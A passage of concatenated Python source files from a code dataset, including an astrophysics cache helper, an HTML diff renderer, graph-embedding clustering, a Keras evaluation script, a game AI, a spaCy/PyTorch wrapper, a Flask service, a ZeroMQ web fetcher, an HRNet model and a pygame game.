kwargs['external_cache_loc']\n else:\n homedir = _find_home()\n astropy_cache_dir = os.path.join(homedir, '.astropy', 'cache')\n defensively_create_subdir(astropy_cache_dir)\n\n halotools_cache_dir = os.path.join(astropy_cache_dir, 'halotools')\n defensively_create_subdir(halotools_cache_dir)\n\n\n if 'catalog_type' not in kwargs.keys():\n return halotools_cache_dir\n else:\n catalog_type = kwargs['catalog_type']\n\n acceptable_processed_halos_arguments = (\n ['subhalos', 'subhalo', 'halo', 'halos', \n 'halo_catalogs', 'subhalo_catalogs', 'subhalo_catalog', 'halo_catalog',\n 'halos_catalogs', 'subhalos_catalogs', 'subhalos_catalog', 'halos_catalog']\n )\n acceptable_particles_arguments = (\n ['particle', 'particles', 'particle_catalog', 'particle_catalogs', \n 'particles_catalog', 'particles_catalogs']\n )\n acceptable_raw_halos_arguments = (\n ['raw_halos', 'raw_subhalos', 'raw_halo', 'raw_subhalo', \n 'raw_halos_catalog', 'raw_subhalos_catalog', 'raw_halo_catalog', 'raw_subhalo_catalog', \n 'raw_halos_catalogs', 'raw_subhalos_catalogs', 'raw_halo_catalogs', 'raw_subhalo_catalogs']\n )\n\n if catalog_type in acceptable_processed_halos_arguments:\n subdir_name = 'halo_catalogs'\n elif catalog_type in acceptable_particles_arguments:\n subdir_name = 'particle_catalogs'\n elif catalog_type in acceptable_raw_halos_arguments:\n subdir_name = 'raw_halo_catalogs'\n else:\n raise CatalogTypeError(catalog_type)\n\n # Create the directory .astropy/cache/halotools/subdir_name\n catalog_type_dirname = os.path.join(halotools_cache_dir, subdir_name)\n defensively_create_subdir(catalog_type_dirname)\n\n # Now check to see if there exists a cache subdirectory for simname\n if 'simname' not in kwargs.keys():\n return catalog_type_dirname\n else:\n if kwargs['simname'] not in supported_sim_list:\n raise UnsupportedSimError(kwargs['simname'])\n\n simname_dirname = os.path.join(catalog_type_dirname, kwargs['simname'])\n defensively_create_subdir(simname_dirname)\n\n if 'halo_finder' not in kwargs.keys():\n return simname_dirname\n else:\n halo_finder_dirname = os.path.join(simname_dirname, kwargs['halo_finder'])\n defensively_create_subdir(halo_finder_dirname)\n return halo_finder_dirname\n\n\ndef processed_halo_tables_web_location(**kwargs):\n \"\"\" Method returns the web location where pre-processed \n halo catalog binaries generated by, and for use with, \n Halotools are stored. \n\n Parameters \n ----------\n simname : string, optional \n Nickname of the simulation. Currently supported simulations are \n Bolshoi (simname = ``bolshoi``), Consuelo (simname = ``consuelo``), \n MultiDark (simname = ``multidark``), and Bolshoi-Planck (simname = ``bolplanck``). \n\n halo_finder : string, optional \n Nickname of the halo-finder, e.g., `rockstar` or `bdm`. \n\n Returns \n -------\n result : string \n If no arguments are passed, method returns the root web directory \n of the Halotools binaries, `root_web_dir`. \n If `simname` is passed, method returns `root_web_dir/simname`. \n If `simname` and `halo_finder` are both passed, \n method returns `root_web_dir/simname/halo_finder`. \n \"\"\"\n\n webroot = sim_defaults.processed_halo_tables_webloc\n\n if 'simname' not in kwargs.keys():\n return webroot\n else:\n simname = kwargs['simname']\n if 'halo_finder' not in kwargs.keys():\n return os.path.join(webroot, simname)\n else:\n halo_finder = kwargs['halo_finder']\n return os.path.join(os.path.join(webroot, simname), halo_finder)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"halotools/sim_manager/cache_config.py","file_name":"cache_config.py","file_ext":"py","file_size_in_byte":7458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"296149984","text":"from ghdiff import GHDiff\n\n\nclass HtmlDiff(GHDiff):\n html_start = ''\n html_end = '
'\n html_line = '%(prefix)s%(content)s'\n html_highlight = '%(content)s'\n\n css_classes = {\n 'control': 'comment',\n 'insert': 'added',\n 'delete': 'removed',\n }\n\n @classmethod\n def _colorize(cls, diff):\n if isinstance(diff, basestring):\n lines = diff.splitlines()\n else:\n lines = diff\n lines.reverse()\n while lines and not lines[-1].startswith(\"@@\"):\n lines.pop()\n yield cls.html_start\n while lines:\n line = lines.pop()\n css_class = \"\"\n if line.startswith(\"@@\"):\n css_class = \"control\"\n elif line.startswith(\"-\"):\n css_class = \"delete\"\n if lines:\n removed_stack = [line]\n added_stack = []\n while lines:\n line = lines.pop()\n if line[0] == '-':\n if added_stack:\n break\n removed_stack.append(line)\n line = None\n elif line[0] == '+':\n added_stack.append(line)\n line = None\n if len(added_stack) == len(removed_stack):\n break\n else:\n break\n\n while removed_stack and added_stack:\n aline, bline = cls._line_diff(removed_stack.pop(0)[1:], added_stack.pop(0)[1:])\n yield cls._make_line('delete', aline, prefix='-')\n yield cls._make_line('insert', bline, prefix='+')\n\n for removed_line in removed_stack:\n yield cls._make_line(css_class, cls.escape(removed_line))\n\n elif line.startswith(\"+\"):\n css_class = \"insert\"\n if line is not None:\n yield cls._make_line(css_class, cls.escape(line))\n yield cls.html_end\n\nclass HtmlDiffWithoutControl(HtmlDiff):\n @classmethod\n def _make_line(cls, css_class, content, prefix=''):\n if css_class == 'control':\n return ''\n return super(HtmlDiffWithoutControl, cls)._make_line(css_class, content, prefix)\n","sub_path":"gim/front/diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"411362667","text":"import numpy as np\nfrom sklearn.manifold import TSNE\nfrom sklearn.utils import Bunch\nimport openne.node2vec as node2vec\nimport networkx as nx\nfrom sklearn.metrics import roc_auc_score\nfrom Code.Network_Fusion.fusion import snf_wrapper as sw\n\n\ndef cluster(nx_graph, ground_truth, Parameter, K1, mu, K2, t, tsne=False):\n wvecs = []\n for G in nx_graph:\n model_nf = node2vec.Node2vec(G, Parameter[\"walk_length\"], Parameter[\"num_walks\"], Parameter[\"dimensions\"], p=1, q=1, dw=True)\n index_num = sorted([int(i) for i in model_nf.vectors.keys()])\n g_embedding = [model_nf.vectors[str(i)] for i in index_num]\n wvecs.append(np.array(g_embedding))\n snf_wrapper = sw.snf_wrapper(wvecs, ground_truth)\n network, ground_truth, best, second = snf_wrapper.fusion(K1, mu, K2, t)\n return network, ground_truth, best, second\n\ndef cluster_E(nx_graph, ground_truth, Parameter, nodes, K1, mu, K2, t, tsne=False):\n # 基于node2vec的表示学习过程\n wvecs = []\n arr_size = len(nodes)\n walk_length = Parameter[\"walk_length\"]\n num_walks = Parameter[\"num_walks\"]\n dimensions = Parameter[\"dimensions\"]\n p = Parameter[\"p\"]\n q = Parameter[\"q\"]\n each_data = np.random.random((arr_size, dimensions))\n for G in nx_graph:\n model_nf = node2vec.Node2vec(G, walk_length, num_walks, dimensions, p=p, q =q, dw=True)\n index_num = sorted([int(i) for i in model_nf.vectors.keys()])\n g_embedding = [model_nf.vectors[str(i)] for i in index_num]\n wvecs.append(np.array(g_embedding))\n\n # SNF算法过程\n snf_wrapper = sw.snf_wrapper(wvecs, ground_truth)\n network, ground_truth, best, second = snf_wrapper.fusion_E(K1, mu, K2, t)\n\n # 返回学习到的网络\n return network, ground_truth, best, second\n","sub_path":"Code/Network_Fusion/Cluster - 副本.py","file_name":"Cluster - 副本.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"547941174","text":"#!/usr/bin/env python\n\n\"\"\"Description:\nThe test.py is to evaluate your model on the test images.\n***Please make sure this file work properly in your final submission***\n\n©2018 Created by Yiming Peng and Bing Xue\n\"\"\"\nfrom keras.models import load_model\nfrom keras.preprocessing.image import img_to_array, ImageDataGenerator\n\n# You need to install \"imutils\" lib by the following command:\n# pip install imutils\nfrom imutils import paths\nfrom sklearn.preprocessing import LabelBinarizer\nimport cv2\nimport os\nimport argparse\n\nimport numpy as np\nimport random\nimport tensorflow as tf\n\n# Set random seeds to ensure the reproducible results\nSEED = 309\nnp.random.seed(SEED)\nrandom.seed(SEED)\ntf.set_random_seed(SEED)\n\n# **************************To Dear Tutor***********************************************************\n# this global batch size is defined according to the template, please modify it when you do the test\n# **************************************************************************************************\nbatch_size = 15\n\n\ndef parse_args():\n \"\"\"\n Pass arguments via command line\n :return: args: parsed args\n \"\"\"\n # Parse the arguments, please do not change\n args = argparse.ArgumentParser()\n args.add_argument(\"--test_data_dir\", default = \"data/test\",\n help = \"path to test_data_dir\")\n args = vars(args.parse_args())\n return args\n\n\ndef load_images(test_data_dir, image_size = (224, 224)):\n \"\"\"\n Load images from local directory\n :return: the image list (encoded as an array)\n \"\"\"\n # **************************To Dear Tutor***********************************************************\n # my model achieve 93% in validation,but 33% here, it means something wrong with the data generator\n # and the way this file load image, so i have modified the way this script loads image, this load method\n # invokes the global batch_size variable, please modify it if you need to, thanks\n # **************************************************************************************************\n test_flow = ImageDataGenerator().flow_from_directory(test_data_dir,batch_size=batch_size,target_size=image_size)\n return test_flow\n\n\ndef preprocess_data(X):\n \"\"\"\n Pre-process the test data.\n :param X: the original data\n :return: the preprocess data\n \"\"\"\n # NOTE: # If you have conducted any pre-processing on the image,\n # please implement this function to apply onto test images.\n return X\n\n\ndef evaluate(test_generator):\n \"\"\"\n Evaluation on test images\n ******Please do not change this function******\n :param X_test: test images\n :param y_test: test labels\n :return: the accuracy\n \"\"\"\n # batch size is 16 for evaluation\n batch_size = 16\n\n # Load Model\n # **************************To Dear Tutor***********************************************************\n # the model generator from the train.py will not name as model, if you need to re-generator my\n # model, please check the train.py thanks\n # **************************************************************************************************\n model = load_model('model/resnet50mycnn.h5')\n return model.evaluate_generator(test_generator,steps=len(test_generator),verbose=1)\n\n\nif __name__ == '__main__':\n # Parse the arguments\n args = parse_args()\n\n # Test folder\n test_data_dir = args[\"test_data_dir\"]\n\n # Image size, please define according to your settings when training your model.\n image_size = (224, 224)\n\n # Load images with imageGenerator\n test_flow = load_images(test_data_dir, image_size)\n\n # Evaluation, please make sure that your training model uses \"accuracy\" as metrics, i.e., metrics=['accuracy']\n loss, accuracy = evaluate(test_flow)\n print(\"loss={}, accuracy={}\".format(loss, accuracy))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"300662033","text":"from . import map\nfrom . import tool, aStarSearch\n\nclass EnemyInfo():\n def __init__(self, entity, enemy, location, distance, damage_half):\n # 保存敌方生物\n self.enemy = enemy\n # 保存目的位置\n self.location = location\n # 保存到目的位置的路径距离\n self.distance = distance\n # 要经过几轮行动攻击到敌方生物\n if distance == 0:\n self.round_num = 0\n else:\n self.round_num = (distance - 1) // entity.attr.distance\n # 敌方生物要攻击几次才会死亡\n hurt = entity.attr.getHurt(enemy.attr, damage_half)\n self.kill_time = (enemy.health-1) // hurt \n # 敌方生物是否是远程生物\n self.remote = enemy.attr.remote\n \ndef getAction(entity, map, enemy_group):\n def getDestination(entity, map, enemy):\n # 获取敌方生物相邻的可攻击地图位置中和行动生物距离最近的地图位置\n dir_list = tool.getAttackPositions(enemy.map_x, enemy.map_y)\n best_pos = None\n min_dis = 0\n for offset_x, offset_y in dir_list:\n x, y = enemy.map_x + offset_x, enemy.map_y + offset_y\n if map.isValid(x, y) and map.isMovable(x, y):\n # 这个相邻地图位置是有效且可移动,获取和行动生物的路径距离\n distance = aStarSearch.getAStarDistance(map, (entity.map_x, entity.map_y), (x, y))\n if distance is None:\n # distance 为 None,表示这个相邻位置不可到达\n continue\n if best_pos is None:\n best_pos = (x, y)\n min_dis = distance\n elif distance < min_dis:\n # 保存路径距离最近的相邻地图位置\n best_pos = (x, y)\n min_dis = distance\n return best_pos\n \n # 创建敌方生物信息列表\n info_list = []\n # 保存最佳的敌方生物\n best_info = None\n # 行动生物是否可以进行远程攻击\n remote_attack = entity.canRemoteAttack(map)\n \n # 遍历敌方生物组中每一个生物,检查生物的地图位置\n for enemy in enemy_group:\n if remote_attack:\n location = None\n distance = 0\n else:\n if tool.isNextToEntity(entity, enemy):\n # 如果敌方生物在相邻的地图格子,不用移动就可以攻击到\n destination = (entity.map_x, entity.map_y) \n else:\n # 否则找到敌方生物的相邻地图格子中和行动生物距离最近的格子位置\n destination = getDestination(entity, map, enemy)\n \n if destination is None:\n # 表示不能行走到这个敌方生物的相邻可攻击的地图位置\n continue\n\n # 获取路径对象 location 和路径距离 distance\n location = aStarSearch.AStarSearch(map, (entity.map_x, entity.map_y), destination)\n _, _, distance = aStarSearch.getFirstStepAndDistance(location)\n \n # 判断基础伤害是否要减半\n if entity.attr.remote and not remote_attack:\n # 如果是远程生物且进行近战攻击,基础伤害减半\n damage_half = True\n else:\n damage_half = False\n # 创建 EnemyInfo 类对象\n enemyinfo = EnemyInfo(entity, enemy, location, distance, damage_half)\n # 添加到敌方生物信息列表\n info_list.append(enemyinfo)\n\n # 遍历可以攻击到的敌方生物信息列表,按照设定的策略选择最佳的敌方生物\n for info in info_list:\n if best_info == None:\n best_info = info\n else:\n if info.round_num < best_info.round_num:\n # 选择攻击前需要行动轮数较小的敌方生物\n best_info = info\n elif info.round_num == best_info.round_num:\n # 攻击前需要行动轮数相同时,比较其他属性\n if info.round_num == 0:\n # 如果本轮行动可以攻击到\n if info.kill_time < best_info.kill_time:\n # 选择杀死敌方生物需要的攻击次数最少的\n best_info = info\n elif info.kill_time == best_info.kill_time:\n # 如果杀死敌方生物需要的攻击次数相同\n if info.remote == True and best_info.remote == False:\n # 优先选择敌方的远程生物\n best_info = info\n elif info.distance < best_info.distance:\n # 优先选择距离更近的敌方生物\n best_info = info\n else:\n # 如果至少下一轮行动才能攻击到敌方生物时\n if info.distance < best_info.distance:\n # 优先选择距离更近的敌方生物\n best_info = info\n \n # 根据最佳敌方生物的行动轮数,选择行动策略\n if best_info.round_num == 0:\n # 本轮行动可以攻击到\n if best_info.location is None:\n # 目的位置为 None, 表示行动生物进行远程攻击\n return (None, best_info.enemy)\n else:\n # 目的位置不为 None, 表示行动生物进行近战攻击\n return ((best_info.location.x, best_info.location.y), best_info.enemy)\n elif best_info.round_num == 1:\n # 下一轮行动可以攻击到,本轮行走的距离,正好使下一轮能攻击到敌方生物\n distance = entity.attr.distance\n x, y = aStarSearch.getPosByDistance(best_info.location, distance)\n return ((x, y), None)\n else:\n # 至少二轮行动才能攻击到敌方生物时,本轮行走最大的距离\n distance = best_info.distance - entity.attr.distance\n x, y = aStarSearch.getPosByDistance(best_info.location, distance)\n return ((x, y), None)\n","sub_path":"test7/source/gameAI.py","file_name":"gameAI.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"132777484","text":"\"\"\"The module torch_mixin defindes Language mixin for pytorch.\"\"\"\nimport itertools\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterable, List, Optional, Sequence, Tuple, Union, cast\n\nfrom camphr_core.utils import get_defaults, get_requirements_line, import_attr\nimport spacy\nfrom spacy.gold import GoldParse\nimport spacy.language\nfrom spacy.language import Language\nfrom spacy.pipeline.pipes import Pipe\nfrom spacy.scorer import Scorer\nfrom spacy.tokens import Doc\nfrom spacy.util import minibatch\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\nfrom .utils import TorchPipe, get_loss_from_docs\n\nlogger = logging.getLogger(__name__)\n\n\nclass TorchLanguage(Language):\n \"\"\"spacy.Language for pytorch.\n\n This class manages all `TorchPipe` components for the sake of training.\n\n Examples:\n >>> nlp = TorchLanguage(Vocab(), meta={\"lang\": \"en\"})\n >>> nlp.add_pipe(foo_torch_pipe)\n >>> optim = nlp.resume_training()\n >>> nlp.update(docs, golds, optim)\n \"\"\"\n\n LANG_FACTORY = \"camphr_torch\"\n\n def __init__(\n self,\n vocab=True,\n make_doc=True,\n max_length=10 ** 6,\n meta={},\n optimizer_config: Dict[str, Any] = {},\n **kwargs,\n ):\n meta = dict(meta)\n meta[\n \"lang_factory\"\n ] = self.LANG_FACTORY # lang_factory is necessary when restoring.\n meta.setdefault(\"requirements\", []).append(get_requirements_line())\n self.lang = meta.get(\"lang\", \"\")\n self.Defaults = get_defaults(self.lang)\n self.optimizer_config = optimizer_config\n super().__init__(vocab, make_doc, max_length, meta=meta, **kwargs)\n\n def update( # type: ignore\n self,\n docs: Sequence[Union[str, Doc]],\n golds: Sequence[Union[Dict[str, Any], GoldParse]],\n optimizer: Optimizer,\n verbose: bool = False,\n ):\n \"\"\"Update `TorchPipe` models in pipeline.\"\"\"\n _docs, _golds = self._format_docs_and_golds(docs, golds)\n self._update_pipes(_docs, _golds)\n self._update_params(_docs, optimizer, verbose)\n\n def _update_pipes(self, docs: Sequence[Doc], golds: Sequence[GoldParse]) -> None:\n for _, pipe in self.pipeline:\n pipe.update(docs, golds)\n\n def _update_params(\n self, docs: Sequence[Doc], optimizer: Optimizer, verbose: bool = False\n ):\n loss = get_loss_from_docs(docs)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n if verbose:\n logger.info(f\"Loss: {loss.detach().item()}\")\n\n def evaluate( # type: ignore\n self,\n docs_golds: Sequence[Tuple[Union[str, Doc], Union[Dict[str, Any], GoldParse]]],\n batch_size: int = 16,\n scorer: Optional[Scorer] = None,\n ) -> Dict[str, Any]:\n \"\"\"Overrided to compute loss\"\"\"\n if scorer is None:\n scorer = Scorer(pipeline=self.pipeline)\n loss = 0.0\n for batch in minibatch(docs_golds, size=batch_size):\n docs, golds = zip(*batch)\n docs, golds = self._format_docs_and_golds(docs, golds) # type: ignore\n for _, pipe in self.pipeline:\n self._eval_pipe(pipe, docs, golds, batch_size=batch_size)\n loss += cast(float, get_loss_from_docs(docs).cpu().float().item())\n for doc, gold in zip(docs, golds):\n scorer.score(doc, gold)\n scores = scorer.scores\n scores[\"loss\"] = loss\n return scores\n\n def _eval_pipe(\n self,\n pipe: Pipe,\n docs: Sequence[Doc],\n golds: Sequence[GoldParse],\n batch_size: int,\n ) -> Sequence[Doc]:\n if not hasattr(pipe, \"pipe\"):\n docs = spacy.language._pipe(docs, pipe, {})\n elif hasattr(pipe, \"eval\"):\n pipe.eval(docs, golds) # type: ignore\n else:\n docs = list(pipe.pipe(docs, batch_size=batch_size)) # type: ignore\n return docs\n\n def resume_training(self, **kwargs) -> Optimizer: # type: ignore\n \"\"\"Gather all torch parameters in each `TorchPipe`s, and create an optimizer.\n\n Args:\n kwargs: passed to `self.make_optimizers`\n \"\"\"\n assert hasattr(self, \"pipeline\")\n\n params = self.get_params()\n return self.create_optimizer(params, **kwargs)\n\n def get_params(self):\n return itertools.chain.from_iterable(\n pipe.optim_parameters()\n for _, pipe in self.pipeline\n if isinstance(pipe, TorchPipe)\n )\n\n def require_optimizer_config(self):\n assert isinstance(\n self.optimizer_config, dict\n ), \"`self.optimizer_config` must be set.\"\n\n def create_optimizer(\n self, params: Iterable[Union[torch.Tensor, Dict[str, Any]]], **kwargs\n ) -> Optimizer:\n cls = import_attr(self.optimizer_config[\"class\"])\n return cls(params, **self.optimizer_config.get(\"params\", {}))\n\n @property\n def device(self) -> torch.device:\n if not hasattr(self, \"_device\"):\n self._device = torch.device(\"cpu\")\n self.to(self._device)\n else:\n for pipe in self.get_torch_pipes():\n assert self._device.type == pipe.device.type\n return self._device\n\n def get_torch_pipes(self) -> List[TorchPipe]:\n return [pipe for _, pipe in self.pipeline if isinstance(pipe, TorchPipe)]\n\n def to(self, device: torch.device) -> bool:\n flag = False\n for pipe in self.get_torch_pipes():\n flag = True\n pipe.to(device)\n self._device = device\n return flag\n\n def to_disk(self, path: Union[str, Path], exclude=tuple(), disable=None):\n \"\"\"Overrides Language.to_disk to save `nlp.lang` properly.\"\"\"\n path = Path(path)\n super().to_disk(path, exclude, disable)\n meta = self.meta\n meta[\"lang\"] = self.lang\n (path / \"meta.json\").write_text(json.dumps(meta))\n\n\ndef get_torch_nlp(lang: str, **cfg):\n return TorchLanguage(meta={\"lang\": lang}, **cfg)\n","sub_path":"subpackages/camphr_torch/camphr_torch/lang.py","file_name":"lang.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"32274914","text":"import os\n\nfrom flask import Flask, json\n\nfrom product_editor import ProductEditor\nfrom product_editor_service import ProductEditorWebService\nfrom product_file_db import ProductFileDb\nfrom product_overview import ProductOverview\nfrom product_overview_service import ProductOverviewWebService, NewestProductIdWebService\n\n\ndef create_flask():\n return Flask(__name__)\n\n\ndef create_product_file_db(path_to_db):\n \"\"\"\n :rtype: bakery.product_model.ProductFileDb\n \"\"\"\n return ProductFileDb(path_to_db)\n\n\ndef create_product_overview(product_gateway, flask):\n \"\"\"\n :type product_gateway: bakery.product_model.ProductGateway\n :type flask: flask.Flask\n \"\"\"\n product_overview = ProductOverview(product_gateway)\n ProductOverviewWebService.init_service(product_overview, flask)\n NewestProductIdWebService.init_service(product_overview, flask)\n\n\ndef create_product_editor(product_gateway, flask):\n \"\"\"\n :type product_gateway: bakery.product_model.ProductGateway\n :type flask: flask.Flask\n \"\"\"\n product_editor = ProductEditor(product_gateway)\n ProductEditorWebService.init_service(product_editor, flask)\n\n\ndef fill_db_with_sample_product(flask):\n \"\"\"\n :type flask: flask.Flask\n \"\"\"\n service = flask.test_client()\n service.post(\"/products\", data=json.dumps({\"name\": \"Bread\", \"price\": \"3.45\", \"id\": \"\"}),\n content_type=\"application/json\")\n\n\napp = create_flask()\nproduct_file_db = create_product_file_db(os.path.abspath(\"product_db\"))\n\ncreate_product_overview(product_file_db, app)\ncreate_product_editor(product_file_db, app)\n\nfill_db_with_sample_product(app)\n","sub_path":"ProjectEnvironment/Bakery/bakery/bakery.py","file_name":"bakery.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"370229530","text":"import sys\nimport time\nimport zmq\nimport logging\nimport requests\nfrom threading import Thread\nfrom queue import Queue\nfrom mosquito.messages import URL\nfrom mosquito.messages.pages import HTMLPage\n\n\nclass Worker(object):\n\n def __init__(self, work_port, result_port, uid, loop=None, timeout=1):\n context = zmq.Context()\n\n self.logger = logging.getLogger('fetcher')\n hdlr = logging.FileHandler('fetcher.log')\n formatter = logging.Formatter(\n '%(asctime)-15s %(levelname)s : %(message)s')\n hdlr.setFormatter(formatter)\n self.logger.addHandler(hdlr)\n self.logger.setLevel(logging.INFO)\n self.id = uid\n # Socket to receive messages on\n self.receiver = context.socket(zmq.PULL)\n self.receiver.connect(work_port)\n\n # Socket to send messages to\n self.sender = context.socket(zmq.PUSH)\n self.sender.connect(result_port)\n self.timeout = timeout\n\n max_threads = 1\n self.work_queue = Queue(max_threads * 10)\n self.result_queue = Queue()\n\n threads = []\n for i in range(max_threads):\n thread = Thread(target=self._fetch)\n thread.start()\n threads.append(thread)\n\n while True:\n url = URL(instance=self.receiver.recv())\n self.work_queue.put(url)\n\n while not self.result_queue.empty():\n page = self.result_queue.get()\n self.sender.send(page.encode())\n\n def _fetch(self):\n while True:\n url = self.work_queue.get()\n try:\n url = url.to_string()\n print(\"Requesting : {}\".format(url))\n r = requests.get(url, timeout=self.timeout)\n page = HTMLPage(response=r)\n self.result_queue.put(page)\n except Exception as exc:\n self.logger.info(\"ERROR: {} {}\".format(url, exc))\n","sub_path":"mosquito/fetcher/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"586162283","text":"import ast\nimport configparser\n\nimport tensorflow.contrib.slim as slim\nfrom tensorflow.contrib.layers.python.layers import layers\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops.init_ops import VarianceScaling\n\nfrom .front import HRFront\nfrom .stage import HRStage\nfrom .transition import ExtraTransition\n\n\ndef he_normal_fanout(seed=None):\n \"\"\"He normal initializer.\n \n It draws samples from a truncated normal distribution centered on 0\n with `stddev = sqrt(2 / fan_out)`\n where `fan_in` is the number of input units in the weight tensor.\n To keep aligned with official implementation\n \"\"\"\n return VarianceScaling(\n scale=2., mode=\"fan_out\", distribution=\"truncated_normal\", seed=seed)\n\n\ndef load_net_cfg_from_file(cfgfile):\n def load_from_options(section, cfg):\n options = dict()\n xdict = dict(cfg.items(section))\n for key, value in xdict.items():\n try:\n value = ast.literal_eval(value)\n except:\n value = value\n options[key] = value\n return options\n\n cfg = configparser.ConfigParser()\n cfg.read(cfgfile)\n\n sections = cfg.sections()\n options = dict()\n for _section in sections:\n options[_section] = load_from_options(_section, cfg)\n\n return options\n\n\ndef HRNet(config_file, input, bn_is_training):\n cfg = load_net_cfg_from_file(config_file)\n stages = []\n\n front = HRFront(num_channels=cfg['FRONT']['num_channels'],\n output_channels=[i * cfg['FRONT']['output_channels'] for i in range(1, 3)])\n stages.append(front)\n\n num_stages = cfg['NET']['num_stages']\n for i in range(num_stages):\n _key = 'S{}'.format(i + 1)\n if i != num_stages - 1:\n _key_next = 'S{}'.format(i + 2)\n else:\n _key_next = 'S{}'.format(i + 1)\n _stage = HRStage(stage_id=i + 1,\n num_modules=cfg[_key]['num_modules'],\n num_channels=cfg[_key]['num_channels'],\n num_out_channels=cfg[_key_next]['num_channels'],\n num_blocks=cfg[_key]['num_blocks'],\n num_branches=cfg[_key]['num_branches'],\n block_type=cfg[_key]['block_type'],\n last_stage=True if i == num_stages - 1 else False)\n stages.append(_stage)\n # from stage1 to stage2, the #channel changed, so we need an extra transition layer.\n if i == 0:\n _stage = ExtraTransition(stage_id=i + 1,\n num_channels=cfg[_key]['num_channels'],\n num_branches=cfg[_key_next]['num_branches'],\n num_out_channels=cfg[_key_next]['num_channels'])\n stages.append(_stage)\n\n batch_norm_params = {'epsilon': 1e-5,\n 'scale': True,\n 'is_training': bn_is_training,\n 'updates_collections': ops.GraphKeys.UPDATE_OPS}\n with slim.arg_scope([layers.batch_norm], **batch_norm_params):\n with slim.arg_scope([slim.conv2d],\n weights_initializer=he_normal_fanout(),\n weights_regularizer=slim.l2_regularizer(cfg['NET']['weight_l2_scale'])):\n out = input\n for stage in stages:\n out = stage.forward(out)\n # print(len(out))\n return out\n","sub_path":"hr_rnet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"624313249","text":"import pygame\nimport time\nimport random\nimport collide\nimport collide_new\nfrom copy import deepcopy\n\npygame.init()\n\ndisplay_width = 800\ndisplay_height = 600\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption(\"OH MY\")\nclock = pygame.time.Clock()\n\n#color definitions\nblack = (0,0,0)\nwhite = (255,255,255)\nred = (255,0,0)\n\n#back_img = pygame.image.load(\"outer_space.png\") \n\ndef text_objects(text, large_font):\n textSurface = large_font.render(text, True, black)\n return textSurface, textSurface.get_rect()\n \ndef message_display(text):\n large_font = pygame.font.Font('freesansbold.ttf', 115)\n #text_objects \n TextSurf, TextRect = text_objects(text, large_font)\n #to center on the screen\n TextRect.center = ((display_width/2),(display_height/2))\n #send to screen, but not display\n gameDisplay.blit(TextSurf, TextRect)\n #updates the display - gets to foreground \n pygame.display.update()\n \ndef crash():\n message_display(\"BOOM\")\n #reset game\n time.sleep(2)\n game_loop()\n\n#################################################\n\nclass Prototype(object):\n def __init__(self, pos_x, pos_y, vel_x, vel_y, vect_x, vect_y, dim_x, dim_y, imgs, scr_max_x,scr_max_y):\n self.pos_x = pos_x\n self.pos_y = pos_y\n self.vel_x = vel_x\n self.vel_y = vel_y\n self.vect_x = vect_x\n self.vect_y = vect_y\n self.dim_x = dim_x\n self.dim_y = dim_y\n self.imgs = imgs\n self.scr_max_x = scr_max_x\n self.scr_max_y = scr_max_y\n\n\nclass Obstacle(Prototype):\n def __init__(self, *args):\n Prototype.__init__(self, *args)\n self.is_moving = False\n self.color = [255,100,50]\n self.name = \"obstacle\"\n\n def collide(self, with_name):\n print (\"OBSTACLE COLLIDED\", with_name)\n self.create()\n\n def create(self):\n delay = random.randrange(0, 350)\n self.pos_x = self.scr_max_x + self.dim_x + delay \n self.pos_y = random.randrange(0, self.scr_max_y-self.dim_y)\n self.is_moving = True\n\n def move(self):\n if self.is_moving == True:\n self.pos_y += self.vect_y * self.vel_y\n self.pos_x += self.vect_x * self.vel_x \n if self.imgs == None: \n #print (self.pos_x, self.pos_y)\n pygame.draw.rect(gameDisplay, self.color,\n [self.pos_x, self.pos_y,\n self.dim_x, self.dim_y])\n else: \n asteroid_img = pygame.image.load(self.imgs)\n asteroid_img = pygame.transform.scale(asteroid_img, (self.dim_x, self.dim_y))\n #asteroid_img = pygame.transform.rotate(asteroid_img, self.pos_x)\n #print (\"posx\",self.pos_x,\"posY:\",self.pos_y, \"dimX\", self.dim_x)\n gameDisplay.blit(asteroid_img, (self.pos_x, self.pos_y))\n\nclass Ship(Prototype):\n def __init__(self, *args):\n Prototype.__init__(self, *args)\n self.ship_img = pygame.image.load(self.imgs[0])\n self.ship_move_img = pygame.image.load(self.imgs[1])\n self.thrust = 0\n self.missle_bay = 25\n self.name = \"ship\"\n self.is_moving = True\n #self.ship_dims = ship_dims #[lenght, height] in px [x,y]\n\n def collide(self, with_name):\n print (\"SHIP COLLIDED\", with_name)\n\n \n def thruster(self, direction):\n self.thrust += self.vel_y*direction\n self.pos_y += self.thrust\n \n def move(self):\n if self.thrust != 0:\n if 0 < self.pos_y < 550:\n self.pos_y += self.thrust\n gameDisplay.blit(self.ship_move_img, (self.pos_x, self.pos_y))\n else:\n self.pos_y -= self.thrust\n else:\n gameDisplay.blit(self.ship_img, (self.pos_x, self.pos_y))\n\nclass Missle(Prototype):\n def __init__(self,*args, missle_bay):\n Prototype.__init__(self, *args)\n self.is_moving = False\n 